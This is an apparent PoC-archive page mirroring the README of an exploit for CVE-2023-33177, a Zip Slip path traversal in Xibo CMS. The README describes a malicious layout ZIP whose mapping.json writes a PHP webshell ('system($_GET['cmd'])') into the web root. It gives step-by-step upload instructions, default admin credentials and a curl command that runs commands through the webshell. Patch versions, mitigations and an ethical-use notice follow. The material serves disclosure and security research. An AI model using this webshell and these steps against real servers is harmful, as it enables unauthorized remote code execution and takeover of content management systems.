Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-33177 PoC — Xibo CMS vulnerable to Remote Code Execution through Zip Slip

Source
https://github.com/complexusprada/Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177
Associated Vulnerability
Title:Xibo CMS vulnerable to Remote Code Execution through Zip Slip (CVE-2023-33177)
Description:Xibo is a content management system (CMS). A path traversal vulnerability exists in the Xibo CMS whereby a specially crafted zip file can be uploaded to the CMS via the layout import function by an authenticated user which would allow creation of files outside of the CMS library directory as the webserver user. This can be used to upload a PHP webshell inside the web root directory and achieve remote code execution as the webserver user. Users should upgrade to version 2.3.17 or 3.3.5, which fix this issue. Customers who host their CMS with Xibo Signage have already received an upgrade or patch to resolve this issue regardless of the CMS version that they are running.
Description
This exploit demonstrates a **path traversal vulnerability** in Xibo CMS (CVE-2023-33177) that allows remote code execution through malicious layout imports.
Readme
# Xibo CMS Zip Slip RCE Exploit CVE-2023-33177

This exploit demonstrates a **path traversal vulnerability** in Xibo CMS (CVE-2023-33177) that allows remote code execution through malicious layout imports.

## Vulnerability Details

**CVE/Advisory:** CVE-2023-33177
**Affected Versions:**
- Xibo CMS 1.8.0 - 2.3.16
- Xibo CMS 3.0.0 - 3.3.4

**Vulnerability Type:** Path Traversal (Zip Slip)
**Impact:** Remote Code Execution (RCE)

### Technical Summary

Xibo CMS allows authenticated users to import layout files via ZIP archives. The import functionality fails to properly validate file paths in the `mapping.json` file, allowing an attacker to write files outside the intended library directory using path traversal sequences (`../../`).

## How the Exploit Works

1. **Creates a valid Xibo layout export structure** with required JSON files
2. **Injects path traversal in `mapping.json`**: Uses `../../web/shell.php` as the file path
3. **Places webshell in traversed path** within the ZIP structure at `library/../../web/shell.php`
4. **Xibo extracts without validation**: Resolves to `/var/www/cms/web/shell.php`
5. **Achieves RCE**: Webshell is accessible at the web root

### The Vulnerability Chain

```
Zip contains: library/../../web/shell.php
Xibo reads:   library/ + ../../web/shell.php (from mapping.json)
Xibo writes:  /var/www/cms/library/temp/ + ../../web/shell.php
Result:       /var/www/cms/web/shell.php ← Webshell in web root!
```

## Usage

### Generate the Exploit

```bash
python3 create_exploit.py
```

This creates `exploit.zip` containing the malicious layout package.

### Exploitation Steps

1. **Access Xibo CMS** and log in with credentials (default: `xibo_admin` / `password`)
2. **Navigate to Import**: Design → Layouts → Import
3. **Upload `exploit.zip`**
4. **Ignore any JSON errors** - the webshell has already been written to disk
5. **Execute commands via webshell**:
   ```bash
   curl 'http://localhost:8080/shell.php?cmd=id'
   ```

## File Structure

The exploit ZIP contains:

```
exploit.zip
├── layout.json          # Valid Xibo layout definition
├── playlist.json        # Empty playlist (triggers JSON import)
├── mapping.json         # Contains path traversal payload
└── library/
    └── ../../web/
        └── shell.php    # PHP webshell (gets extracted to web root)
```

## Webshell Functionality

The embedded webshell is minimal:

```php
<?php system($_GET["cmd"]); ?>
```

Access it via: `http://<target>/shell.php?cmd=<command>`

## Mitigation

**Patched Versions:**
- Upgrade to Xibo CMS 2.3.17+ (for 2.x branch)
- Upgrade to Xibo CMS 3.3.5+ (for 3.x branch)

**Mitigation Strategies:**
1. Validate all file paths in ZIP archives before extraction
2. Reject paths containing `..` or absolute paths
3. Use secure extraction methods that prevent directory traversal
4. Implement proper input validation on import functionality
5. Restrict file upload permissions to authenticated, authorized users only

## Legal & Ethical Notice

This exploit is provided for:
- Educational purposes
- CTF competitions
- Authorized security testing
- Defensive security research

**Do not use this exploit against systems you do not own or have explicit permission to test.**

## References

- **Advisory:** GHSA-jj27-x85q-crqv
- **Xibo CMS:** https://xibo.org.uk/
- **Zip Slip Vulnerability:** https://security.snyk.io/research/zip-slip-vulnerability
- **CVE-2023-33177:** https://nvd.nist.gov/vuln/detail/CVE-2023-33177


## Author

complexusprada
November 2025
File Snapshot

 [4.0K]  /data/pocs/a231b02c48060249881f252508ab6021ed78a3fd
├── [2.9K]  create_exploit.py
└── [3.5K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →